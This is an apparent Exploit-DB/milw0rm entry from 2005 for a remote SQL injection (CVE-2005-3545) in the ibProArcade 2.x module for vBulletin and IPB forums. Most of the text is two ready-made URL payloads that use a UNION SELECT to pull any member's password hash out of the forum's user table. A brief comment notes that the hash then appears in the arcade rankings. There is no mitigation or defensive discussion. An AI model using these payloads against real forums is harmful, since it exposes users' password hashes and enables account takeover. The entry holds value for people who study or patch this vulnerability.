ibProArcade 2.x module vBulletin/IPB Remote SQL Injection Exploit

ID EDB-ID:1296
Type exploitdb
Reporter B~HFH
Modified 2005-11-06T00:00:00


ibProArcade 2.x module (vBulletin/IPB) Remote SQL Injection Exploit. CVE-2005-3545. Webapps exploit for php platform

                                            # Rankings for (name) will state the md5 hash for the user /str0ke
# ibProArcade 2.x

index.php?act=Arcade&module=report&user=-1 union select password from ibf_members where id=[any_user]

vBulettin forums:
index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]

Author: B~HFH
Email:  bhfh01@gmail.com

# milw0rm.com [2005-11-06]